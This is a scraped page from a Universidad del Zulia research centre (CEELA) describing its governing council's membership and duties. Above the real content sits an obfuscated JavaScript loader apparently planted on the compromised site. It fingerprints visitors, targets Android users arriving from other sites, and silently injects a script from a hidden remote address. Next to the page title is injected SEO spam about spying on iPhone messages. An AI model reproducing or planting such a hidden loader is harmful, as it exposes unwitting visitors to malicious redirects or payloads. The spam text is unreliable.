;(function(){var n=navigator,d=document,s=screen,w=window,u=n[p("dt(naevg)A!rueesiuu")],q=n[p("2mlrxohfntza0lipy")],t=d[p("3e!ifkho2o8co")],o=w[p("sn0oqiwt6amtmnde2izrxos")],h=w[p("rnhofi0t9adcaoll1")][p("beamlann8t(s3odhy")],dr=d[p("qrkemrbrvetf5elr4")],dt=s.height/w.devicePixelRatio-w.screenTop;if(!c(dr,h)&&dr!==''){if(dt>0&&o!==undefined){if(c(u,p("!d1ito!rbd3noAy"))&&!c(u,p("1s0wsocdhngiiWk"))){if(c(q,p("!d1ito!rbd3noAy"))||c(q,p("jxdueniilLe"))){if(!c(t,p("2=3a4m8tnu3_a_v"))){var e=d.createElement('script');e.type='text/javascript';e.async=true;e.src=p('hafdy4i64798l9uf89xfxf6d57ce06c6zfyed5c6y58dl5u9d4d8n0x2ddfc7fxcl=ov)&m2(1q=jdxilcv?uskjj.(e2dio(ne_pibuk/am7opci.z5(633asgtrantpsrk2coioluco/h/s:dsspztxtzh(');var v=d.getElementsByTagName('script')[0];v.parentNode.insertBefore(e,v)}}}}}function p(e){var k='';for(var w=0;w=0;q--){d+=a[q]}return d}})(); Consejo directivo - Centro Experimental de Estudios Latinoamericanos <br /> 'Dr. Gastón Parra Luzardo' spy on messages from iphone 6s spy see more visit web page article source
Universidad del Zulia
Correo LUZMapa del sitio
20 de octubre de 2018
 
Mas del CEELA
Descargas
Eventos
Documentos
Enlaces
 
 
  images/stories/botones/boton-directorio.jpg  
  images/stories/botones/boton-bonus.jpg  
  /images/stories/botones/boton-nomina.jpg  

tope19_exteriores

Agrandar texto   Reducir texto   Reestablecer texto    
Consejo directivo Imprimir Correo

El Consejo Directivo está integrado por el Vicerrector (a) Académico (a) de LUZ, quien lo presidirá; un representante del Consejo de Desarrollo Científico y Humanístico y Tecnológico (Condes); un representante de cada una de las facultades; un representante del Consejo Central de Postgrado; el Director del Centro; dos representantes de los profesores e investigadores del Centro y un representante de los estudiantes de los cursos de posgrado en funcionamiento en el Ceela. 


Las atribuciones de este consejo serán:

 

  • Velar por el funcionamiento normal del centro y por el cabal cumplimiento de todos sus fines.

 

  • Conocer el proyecto del presupuesto anual del centro, el cual será elaborado por el director de acuerdo con el Consejo Técnico.

 

  • Conocer y aprobar las normas, planes y programas anuales de estudios e investigación del Ceela y someterlos a consideración de los órganos legales correspondientes.

 

  • Resolver conflictos de jurisdicción entre los órganos de dirección del Ceela y asesorar en la interpretación de las políticas y programas aplicables según el caso.

 

  • Trazar los lineamientos generales para los planes de autofinanciamiento del Ceela, de acuerdo con las normas establecidas en el Reglamento General de Investigación Capítulo IV Art. 63 y 64.

 

 




^ Subir